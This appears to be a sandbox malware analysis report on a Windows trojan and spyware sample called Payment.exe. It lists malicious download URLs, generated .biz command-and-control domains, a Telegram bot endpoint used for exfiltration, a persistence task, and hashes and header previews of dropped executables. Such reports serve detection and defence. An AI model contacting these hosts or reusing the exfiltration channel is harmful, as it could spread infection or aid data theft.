                                                                                                                                                                                                                                                                                                                  http://52.26.80.133/Payment.exe, 00000008.00000002.2178012135.0000000006FC2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                    https://api.telegram.org/bot/sendMessage?chat_id=&text=Payment.exe, 00000008.00000002.2150772680.0000000003DBE000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003AB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                      http://vyome.biz/Payment.exe, 00000008.00000002.2178012135.0000000006FC2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                        https://g.live.com/odclientsettings/Prod/C:svchost.exe, 0000002B.00000003.1203309926.0000019D59021000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                          http://18.142.91.111/gfoywiqgPayment.exe, 00000008.00000002.2178910492.000000000702E000.00000004.00000020.00020000.00000000.sdmp, Payment.exe, 00000008.00000002.2178012135.0000000006FD2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                            http://18.142.91.111/oqljmnqcmPayment.exe, 00000008.00000002.2178012135.0000000006FD2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                              https://duckduckgo.com/chrome_newtabv20jwBqGZseW.exe, 00000027.00000002.2150258037.0000000004A49000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                https://firefox.settings.services.mozilla.com/v1MaybeMigrateVersion1118.0.1.0indefault-browser-agent.exe.8.drfalse
                                                                                                                                                                                                                                                                                                                                  http://208.117.43.225/lpjrtgtrcjPayment.exe, 00000008.00000002.2178012135.0000000006FD2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                    http://85.214.228.140:80/unklgjihfthcPayment.exe, 00000008.00000002.2178910492.000000000702E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                      http://saytjshyf.biz/Payment.exe, 00000008.00000002.2178012135.0000000006FC2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                        http://52.212.150.54:80/uqgubhowqkworycc6Payment.exe, 00000008.00000002.2178910492.000000000702E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                                                                                                          • 75% < No. of IPs
                                                                                                                                                                                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                                                                                                          132.226.8.169
                                                                                                                                                                                                                                                                                                                                          checkip.dyndns.comUnited States
                                                                                                                                                                                                                                                                                                                                          16989UTMEMUSfalse
                                                                                                                                                                                                                                                                                                                                          54.169.144.97
                                                                                                                                                                                                                                                                                                                                          xlfhhhm.bizUnited States
                                                                                                                                                                                                                                                                                                                                          16509AMAZON-02UStrue
                                                                                                                                                                                                                                                                                                                                          104.21.64.1
                                                                                                                                                                                                                                                                                                                                          reallyfreegeoip.orgUnited States
                                                                                                                                                                                                                                                                                                                                          13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                                                                                                          52.43.119.120
                                                                                                                                                                                                                                                                                                                                          nqwjmb.bizUnited States
                                                                                                                                                                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                          52.11.240.239
                                                                                                                                                                                                                                                                                                                                          pywolwnvd.bizUnited States
                                                                                                                                                                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                          54.85.87.184
                                                                                                                                                                                                                                                                                                                                          ytctnunms.bizUnited States
                                                                                                                                                                                                                                                                                                                                          14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                                                                                                          149.154.167.220
                                                                                                                                                                                                                                                                                                                                          api.telegram.orgUnited Kingdom
                                                                                                                                                                                                                                                                                                                                          62041TELEGRAMRUtrue
                                                                                                                                                                                                                                                                                                                                          34.245.175.187
                                                                                                                                                                                                                                                                                                                                          tbjrpv.bizUnited States
                                                                                                                                                                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                          3.229.117.57
                                                                                                                                                                                                                                                                                                                                          npukfztj.bizUnited States
                                                                                                                                                                                                                                                                                                                                          14618AMAZON-AESUStrue
                                                                                                                                                                                                                                                                                                                                          34.229.166.50
                                                                                                                                                                                                                                                                                                                                          gnqgo.bizUnited States
                                                                                                                                                                                                                                                                                                                                          14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                                                                                                          13.213.51.196
                                                                                                                                                                                                                                                                                                                                          wllvnzb.bizUnited States
                                                                                                                                                                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                          52.26.80.133
                                                                                                                                                                                                                                                                                                                                          vrrazpdh.bizUnited States
                                                                                                                                                                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                          13.248.148.254
                                                                                                                                                                                                                                                                                                                                          084725.parkingcrew.netUnited States
                                                                                                                                                                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                          18.142.91.111
                                                                                                                                                                                                                                                                                                                                          sxmiywsfv.bizUnited States
                                                                                                                                                                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                          192.64.119.165
                                                                                                                                                                                                                                                                                                                                          anpmnmxo.bizUnited States
                                                                                                                                                                                                                                                                                                                                          22612NAMECHEAP-NETUSfalse
                                                                                                                                                                                                                                                                                                                                          199.59.243.228
                                                                                                                                                                                                                                                                                                                                          76899.bodis.comUnited States
                                                                                                                                                                                                                                                                                                                                          395082BODIS-NJUSfalse
                                                                                                                                                                                                                                                                                                                                          91.195.240.19
                                                                                                                                                                                                                                                                                                                                          parkingpage.namecheap.comGermany
                                                                                                                                                                                                                                                                                                                                          47846SEDO-ASDEfalse
                                                                                                                                                                                                                                                                                                                                          165.160.13.20
                                                                                                                                                                                                                                                                                                                                          myups.bizUnited States
                                                                                                                                                                                                                                                                                                                                          19574CSCUSfalse
                                                                                                                                                                                                                                                                                                                                          208.117.43.225
                                                                                                                                                                                                                                                                                                                                          gytujflc.bizUnited States
                                                                                                                                                                                                                                                                                                                                          32748STEADFASTUSfalse
                                                                                                                                                                                                                                                                                                                                          72.52.178.23
                                                                                                                                                                                                                                                                                                                                          przvgke.bizUnited States
                                                                                                                                                                                                                                                                                                                                          32244LIQUIDWEBUSfalse
                                                                                                                                                                                                                                                                                                                                          85.214.228.140
                                                                                                                                                                                                                                                                                                                                          dlynankz.bizGermany
                                                                                                                                                                                                                                                                                                                                          6724STRATOSTRATOAGDEfalse
                                                                                                                                                                                                                                                                                                                                          52.212.150.54
                                                                                                                                                                                                                                                                                                                                          brsua.bizUnited States
                                                                                                                                                                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                          82.112.184.197
                                                                                                                                                                                                                                                                                                                                          vjaxhpbji.bizRussian Federation
                                                                                                                                                                                                                                                                                                                                          43267FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRUfalse
                                                                                                                                                                                                                                                                                                                                          IP
                                                                                                                                                                                                                                                                                                                                          127.0.0.1
                                                                                                                                                                                                                                                                                                                                          Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                                                                                                                                                                                          Analysis ID:1662149
                                                                                                                                                                                                                                                                                                                                          Start date and time:2025-04-10 18:08:50 +02:00
                                                                                                                                                                                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                                                                                                          Overall analysis duration:0h 14m 11s
                                                                                                                                                                                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                                                                                                          Report type:full
                                                                                                                                                                                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                                                                                                                          Number of analysed new started processes analysed:43
                                                                                                                                                                                                                                                                                                                                          Number of new started drivers analysed:3
                                                                                                                                                                                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                                                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                                                                                                                                                                                                          Technologies:
                                                                                                                                                                                                                                                                                                                                          • HCA enabled
                                                                                                                                                                                                                                                                                                                                          • EGA enabled
                                                                                                                                                                                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                                                                                                                                                                                          Sample name:Payment.exe
                                                                                                                                                                                                                                                                                                                                          Detection:MAL
                                                                                                                                                                                                                                                                                                                                          Classification:mal100.spre.troj.spyw.expl.evad.winEXE@38/170@98/24
                                                                                                                                                                                                                                                                                                                                          EGA Information:
                                                                                                                                                                                                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                                                                                                                                                                                                          HCA Information:
                                                                                                                                                                                                                                                                                                                                          • Successful, ratio: 91%
                                                                                                                                                                                                                                                                                                                                          • Number of executed functions: 346
                                                                                                                                                                                                                                                                                                                                          • Number of non-executed functions: 47
                                                                                                                                                                                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                                                                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                                                                                                                                                                                                                          • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                                                                                                                                                                                                                                          • Exclude process from analysis (whitelisted): SearchFilterHost.exe, dllhost.exe, DiagnosticsHub.StandardCollector.Service.exe, SearchProtocolHost.exe, SIHClient.exe, VSSVC.exe, WmiApSrv.exe, SearchIndexer.exe, svchost.exe
                                                                                                                                                                                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 23.9.183.29, 20.12.23.50
                                                                                                                                                                                                                                                                                                                                          • Excluded domains from analysis (whitelisted): ww7.fwiwk.biz, fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, oflybfv.biz, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, fe3cr.delivery.mp.microsoft.com, ww12.przvgke.biz, yhqqc.biz, mnjmhp.biz, prod.fs.microsoft.com.akadns.net, c.pki.goog
                                                                                                                                                                                                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                                                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                                                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                                                                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                                                                                                                          • Report size getting too big, too many NtReadFile calls found.
                                                                                                                                                                                                                                                                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                                                                                                                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                                                                                                                          • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                                                                                                                                                                                                                                          TimeTypeDescription
                                                                                                                                                                                                                                                                                                                                          12:09:42API Interceptor913798x Sleep call for process: Payment.exe modified
                                                                                                                                                                                                                                                                                                                                          12:09:45API Interceptor49x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                                                                                                                                          12:09:48API Interceptor301958x Sleep call for process: perfhost.exe modified
                                                                                                                                                                                                                                                                                                                                          12:09:49API Interceptor7186x Sleep call for process: jwBqGZseW.exe modified
                                                                                                                                                                                                                                                                                                                                          12:10:18API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                                                                                                                                                          12:10:23API Interceptor199x Sleep call for process: msdtc.exe modified
                                                                                                                                                                                                                                                                                                                                          18:09:47Task SchedulerRun new task: jwBqGZseW path: C:\Users\user\AppData\Roaming\jwBqGZseW.exe
                                                                                                                                                                                                                                                                                                                                          No context
                                                                                                                                                                                                                                                                                                                                          No context
                                                                                                                                                                                                                                                                                                                                          No context
                                                                                                                                                                                                                                                                                                                                          No context
                                                                                                                                                                                                                                                                                                                                          No context
                                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Payment.exe
                                                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                          Size (bytes):1721856
                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.39188893373012
                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                          SSDEEP:24576:H1CAR0itVg9N9JMlDlfjRiVuVsWt5MJMs:VCAbgFIDRRAubt5M
                                                                                                                                                                                                                                                                                                                                          MD5:CAEA8C1E10BADBC4E0F7E710DCB16FD8
                                                                                                                                                                                                                                                                                                                                          SHA1:9D412B55BCBA1293AF57CBF3FD3D99C07D330247
                                                                                                                                                                                                                                                                                                                                          SHA-256:DFA89701A8EA978D66155F2885307802EE0E7C01191C8257C61B94C4B753D87F
                                                                                                                                                                                                                                                                                                                                          SHA-512:6DE165B6F9688F219DFB01B1E74658CAC90CB0F4BBF0870D91C216F93635654010867E5E77B4E62D0EC1DF77DA7629796044FBB57DBA7947E4A70575BEC6F26F
                                                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.~.2.-.2.-.2.-n.G-.2.-n.E-J2.-n.D-.2.-.Z.,.2.-.Z.,.2.-.Z.,.2.-.J%-.2.-.2.-.2.-.[.,.2.-.[I-.2.-.2!-.2.-.[.,.2.-Rich.2.-........................PE..L...g.(c.....................6......&........0....@..........................`'......{......................................,b..<....p...............................L..8............................L..@............0..,............................text............................... ..`.rdata...8...0...:..."..............@..@.data........p.......\..............@....rsrc........p.......f..............@...................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Payment.exe
                                                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                          Size (bytes):1663488
                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.320202864684943
                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                          SSDEEP:12288:cNUqaKghyV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:cCZKg8Vg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                                                                                                                                                                                          MD5:18E4A1EC0763852092619F7BBED8D4BF
                                                                                                                                                                                                                                                                                                                                          SHA1:B7856FE2D413F6D870C737BD81E0549C32629B10
                                                                                                                                                                                                                                                                                                                                          SHA-256:5A86FE7665AD2A64BD44B1AB29DC74EA7618765AEE94217BC845B811A88F81E9
                                                                                                                                                                                                                                                                                                                                          SHA-512:FCCC5BA8428BB235FC1C134383F0F873A39D35688A3F2A4B24084EDE8A35D554B0089262D9D1E355C08920A788BEF72BBC3AB95C391278EDA01D427449FF003F
                                                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........jZ..9Z..9Z..9...9Q..9...9%..9...9B..9...8r..9...8K..9...8H..9S.x9W..9Z..9..9...8]..9...9[..9Z.|9[..9...8[..9RichZ..9........PE..L...C.(c.........."......:...........\.......P....@..........................`&.....%,......................................$...........0..............................8...............................@............P...............................text...19.......:.................. ..`.rdata...|...P...~...>..............@..@.data...............................@....rsrc...0...........................@..@.reloc.......`.......r..............@...........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Payment.exe
                                                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                          Size (bytes):1682944
                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.3248333884090755
                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                          SSDEEP:12288:tiEhwdbTLV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:ZKdHBVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                                                                                                                                                                                          MD5:4C1D33654EF089BD0F582EE18EEB8543
                                                                                                                                                                                                                                                                                                                                          SHA1:B4100D5803FA49E715D23E09DBB1C50E2E4761C9
                                                                                                                                                                                                                                                                                                                                          SHA-256:C5473E8E3198D2BA3CDAC89AF636F4BCB1B88E3130636D1D329CBDBA1AFDC979
                                                                                                                                                                                                                                                                                                                                          SHA-512:4B433C76F1237E53694953BE685EB14B54C199D82682276E2684218A4DDF96D551956EF1920AFFBFB2E6E6E72B3C995A0C1E541396E5BD61C1B0E833721393EE
                                                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9..X...X...X..-....X..-....X..-....X...0...X...0...X...0...X... n..X...X..YX..<1.X..<1...X...Xj..X..<1...X..Rich.X..........................PE..d...G.(c.........."......J...^......Tr.........@..............................&......R.... .................................................,........ ..0...............................8............................................`..`............................text....H.......J.................. ..`.rdata.......`.......N..............@..@.data........ ......................@....pdata..............................@..@.rsrc...0.... ......."..............@..@.reloc..............................@...................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Payment.exe
                                                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                          Size (bytes):2203136
                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.646518905093195
                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                          SSDEEP:49152:JK0eqkSR7Xgo4TiRPnLWvJTgFIDRRAubt5M:JK0pR7Xn4TiRCvJkUf
                                                                                                                                                                                                                                                                                                                                          MD5:866B0D30E50ACD65EF8DCC8A6AF42A43
                                                                                                                                                                                                                                                                                                                                          SHA1:0A05CEEE310D5CBC0108218AF8C7AE720EFB89A0
                                                                                                                                                                                                                                                                                                                                          SHA-256:FCF0A7D66EBEBA6CD3F41A61DE619C22F111D264BC8900C2F30AF33364DFCBC1
                                                                                                                                                                                                                                                                                                                                          SHA-512:D80876168781F9B6E1300DA872CB87C08B2C673B03F4E5AD418EDC44F012BB2D74B4B020C006D02756798B2F9AF8BCD22D42C1B95C29760072A88EBF0E13BD6D
                                                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................Y;6....Y;4.x...Y;5...........................D......T...........H......H.8.....P....H......Rich...................PE..L...9.(c..........#..................d............@..........................."......."..............................................p..X...............................p...............................@...............X............................text.............................. ..`.rdata..$H.......J..................@..@.data....@... ......................@....rsrc........p......................@...................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Payment.exe
                                                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                          Size (bytes):2369024
                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.564157779799397
                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                          SSDEEP:49152:1fYP1JsEDkSR7Xgo4TiRPnLWvJTgFIDRRAubt5M:lYPBR7Xn4TiRCvJkUf
                                                                                                                                                                                                                                                                                                                                          MD5:E16DFF32C8D52DA1A4F8D2F29C4E0486
                                                                                                                                                                                                                                                                                                                                          SHA1:7AB9A7ECA703F04278BE13A8C44D329CB9F3CFEB
                                                                                                                                                                                                                                                                                                                                          SHA-256:465818464FFA9A646A4A2B0A2653E561FA29C45ECA6C23AA5BABE84D74005052
                                                                                                                                                                                                                                                                                                                                          SHA-512:9AC13F3CCE5F5D5F31A0A5D927EB0621A8735A99FC0E2B65D436152DF269EC4042BD0724422B090A41EFBE0D4E3750891366CE55F8EFBB6AB7355C471FC49D87
                                                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<y..x...x...x....~.s....|......}.a...*p..i...*p..p...*p..H...q`..z...q`..a...x...s....q..[....qp.y...x...z....q..y...Richx...........PE..d...>.(c..........#..........0......(..........@..............................$.....;.$... .............................................................X........e...................n..p...................0p..(...0o...............0...............................text............................... ..`.rdata.......0......."..............@..@.data....R...0... ... ..............@....pdata...e.......f...@..............@..@.rsrc...............................@...................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Payment.exe
                                                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                          Size (bytes):1613824
                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.154564404266869
                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                          SSDEEP:24576:ZYUckn3Vg9N9JMlDlfjRiVuVsWt5MJMs:ZZcknlgFIDRRAubt5M
                                                                                                                                                                                                                                                                                                                                          MD5:95015C9338A9AD63CE23D9ED592647F9
                                                                                                                                                                                                                                                                                                                                          SHA1:D02C5D0853C58FE212B608CEE49F1F302658ACE9
                                                                                                                                                                                                                                                                                                                                          SHA-256:E31D1B1AB0208810B1FE3C2846472AD2D6290B9B7164BFB2EB424863610E3668
                                                                                                                                                                                                                                                                                                                                          SHA-512:C314045059C9E0B50B02AD3D3B7C5C6CA97972816BC93733AFBBFC0D431B0A01B596AC362ED815ED302D5112C5A02FD56703FACBFD29A0B5F97EE4C05687A605
                                                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........[m..5>..5>..5>OC.>..5>OC.>..5>OC.>..5>..0?..5>..1?..5>..6?..5>.>..5>..4>..5>.>..5>^.<?..5>^..>..5>..>..5>^.7?..5>Rich..5>........................PE..L.....(c..........................................@..........................................................................%..d....P.................................8...............................@...............t............................text.............................. ..`.rdata...^.......`..................@..@.data...l....0....... ..............@....rsrc.......P.......*..............@..@.reloc..............................@...................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Payment.exe
                                                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                          Size (bytes):1640448
                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.1655174687843175
                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                          SSDEEP:49152:Z+iAqSPyC+NltpScpzbtvpJoMQSq/jrQaSPgFIDRRAubt5M:DSktbpiUf
                                                                                                                                                                                                                                                                                                                                          MD5:341FDF5A81771F266F0AD0BB9F2CDFAF
                                                                                                                                                                                                                                                                                                                                          SHA1:B7599EB8FFC197C9CDEB601B9FDAF52D1A45A515
                                                                                                                                                                                                                                                                                                                                          SHA-256:25DCF8ADBAEADAC5064F9EE92C39D6313025CE6BC7690F1BB023F48BE15098C2
                                                                                                                                                                                                                                                                                                                                          SHA-512:9FFC69C4A040C223B947956403D6180CB07B5865C639C6EBA2894F9457AF02BEA03B37DBA89CD86E3D4543C5559BD5AC517463581D8FB46F0041976A73081961
                                                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......}0tp9Q.#9Q.#9Q.#...#,Q.#...#.Q.#...#.Q.#...#8Q.#k9.".Q.#k9."(Q.#k9."1Q.#0).#1Q.#0).#8Q.#0).#.Q.#9Q.#.S.#.8."hQ.#.8."8Q.#.8.#8Q.#9Q.#;Q.#.8."8Q.#Rich9Q.#........PE..d...3.(c.........."......H...*.......Z.........@....................................?;.... ...@...............@..............................l..|.......P....P...o.................. .......................p...(...@................`..8............................text...<G.......H.................. ..`.rdata..|B...`...D...L..............@..@.data... ........P..................@....pdata...o...P...p..................@..@.rsrc...P............P..............@..@.reloc...............(..............@...................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Payment.exe
                                                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                          Size (bytes):2953728
                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.092804437708469
                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                          SSDEEP:49152:PGSXoV72tpV9XE8Wwi1aCvYMdVluS/fYw44RxL+gFIDRRAubt5M:X4OEtwiICvYMRffUf
                                                                                                                                                                                                                                                                                                                                          MD5:C4B84B9E0E064E8C9349669F42B33CE1
                                                                                                                                                                                                                                                                                                                                          SHA1:5228E1AD9086D9C175FDE739816D7EB6712F9D91
                                                                                                                                                                                                                                                                                                                                          SHA-256:455766EBCC4E9A9A7A6F7C44D0B0DD18F2E870B10DBD7EF6825177041BF1A611
                                                                                                                                                                                                                                                                                                                                          SHA-512:B53C1B22A083F328D0E0A3FF06678D5BA02BC6D1DE43189C1D486AEABF5F51705DAA4E0206A9F66A8D5848EEF3CC958CA3872C7CB24B131499876D8161FBA3F3
                                                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~....................@..........................P-.......-.............................p...<............@ .............................@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Payment.exe
                                                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                          Size (bytes):1854464
                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.613160385518719
                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                          SSDEEP:24576:KAMzR+3kMbVjhdVg9N9JMlDlfjRiVuVsWt5MJMs:no+lbVjh3gFIDRRAubt5M
